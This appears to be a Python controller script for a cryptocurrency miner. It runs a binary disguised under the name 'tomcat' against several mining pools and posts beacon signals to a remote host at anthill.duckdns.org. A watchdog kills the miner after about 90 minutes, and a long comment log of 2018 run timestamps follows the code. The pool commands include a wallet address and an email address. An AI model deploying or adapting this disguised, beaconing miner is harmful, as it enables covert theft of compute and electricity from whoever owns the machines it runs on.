import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:01.537167
#2018-02-17 17:03:01.695074
#2018-02-17 18:50:01.907985
#2018-02-17 20:38:04.810684
#2018-02-17 22:24:06.698952
#2018-02-18 00:08:07.359612
#2018-02-18 01:59:01.761802
#2018-02-18 03:46:05.366159
#2018-02-18 05:34:01.655693
#2018-02-18 07:27:01.580432
#2018-02-18 09:14:01.735285
#2018-02-18 10:59:07.037730
#2018-02-18 12:46:05.483241
#2018-02-18 14:31:05.281386
#2018-02-18 16:21:04.966870
#2018-02-18 18:10:06.642270
#2018-02-18 19:56:05.484587
#2018-02-18 21:44:05.631994
#2018-02-18 23:33:03.415934
#2018-02-19 01:19:06.902670
#2018-02-19 03:07:02.169090
#2018-02-19 04:52:07.462696
#2018-02-19 06:36:01.984541
#2018-02-19 08:26:05.180849
#2018-02-19 10:15:08.183621
#2018-02-19 12:02:06.953495
#2018-02-19 13:50:01.539553
#2018-02-19 15:38:09.055280
#2018-02-19 17:27:02.128356
#2018-02-19 19:15:07.891325
#2018-02-19 21:04:01.824033
#2018-02-19 22:51:07.566597
#2018-02-20 00:35:07.665978
#2018-02-20 02:24:04.959313
#2018-02-20 04:14:03.686026
#2018-02-20 05:57:01.397148
#2018-02-20 07:42:08.323584
#2018-02-20 09:26:05.753238
#2018-02-20 11:10:02.063962
#2018-02-20 12:56:09.662840
#2018-02-20 14:42:06.469339
#2018-02-20 16:26:01.403135
#2018-02-20 18:14:03.900472
#2018-02-20 20:05:07.770439
#2018-02-20 21:52:01.916002
#2018-02-20 23:32:07.637949
#2018-02-21 01:17:06.784385
#2018-02-21 03:04:02.005257
#2018-02-21 04:51:05.249862
#2018-02-21 06:40:08.246262
#2018-02-21 08:27:01.708372
#2018-02-21 10:12:06.295445
#2018-02-21 11:59:06.410405
#2018-02-21 13:49:08.023104
#2018-02-21 15:34:07.799612
#2018-02-21 17:23:01.733840
#2018-02-21 19:11:06.287947
#2018-02-21 20:59:01.976681
#2018-02-21 22:46:09.387126
#2018-02-22 00:34:08.691393
#2018-02-22 02:22:07.455357
#2018-02-22 04:10:05.906155
#2018-02-22 05:55:03.567796
#2018-02-22 07:41:06.003668
#2018-02-22 09:29:05.647854
#2018-02-22 11:16:02.029793
#2018-02-22 13:01:06.539374
#2018-02-22 14:48:09.041906
#2018-02-22 16:35:08.981941
#2018-02-22 18:22:06.350767
#2018-02-22 20:14:06.825650
#2018-02-22 22:01:03.876610
#2018-02-22 23:48:04.910927
#2018-02-23 01:36:04.199061
#2018-02-23 03:22:05.331141
#2018-02-23 05:09:07.212661
#2018-02-23 06:54:05.839423
#2018-02-23 08:42:06.556324
#2018-02-23 10:58:04.189038
#2018-02-23 12:53:01.395675
#2018-02-23 14:37:04.394405
#2018-02-23 16:26:01.556827
#2018-02-23 18:12:04.146484
#2018-02-23 19:57:03.901727
#2018-02-23 21:40:06.483053
#2018-02-23 23:28:06.517669
#2018-02-24 01:20:08.863463
#2018-02-24 03:12:06.042667
#2018-02-24 04:57:05.384852
#2018-02-24 06:46:05.358794
#2018-02-24 08:32:05.866533
#2018-02-24 10:19:07.046969
#2018-02-24 12:14:07.674802
#2018-02-24 14:07:05.030356
#2018-02-24 15:53:05.487826
#2018-02-24 17:47:05.953538
#2018-02-24 19:34:07.903573
#2018-02-24 21:21:01.678028
#2018-02-24 23:59:04.849975
#2018-02-25 03:16:04.589841
#2018-02-25 06:03:07.289214
#2018-02-25 10:34:01.411554
#2018-02-25 12:07:02.092323
#2018-02-25 14:19:01.510069
#2018-02-25 15:54:01.490931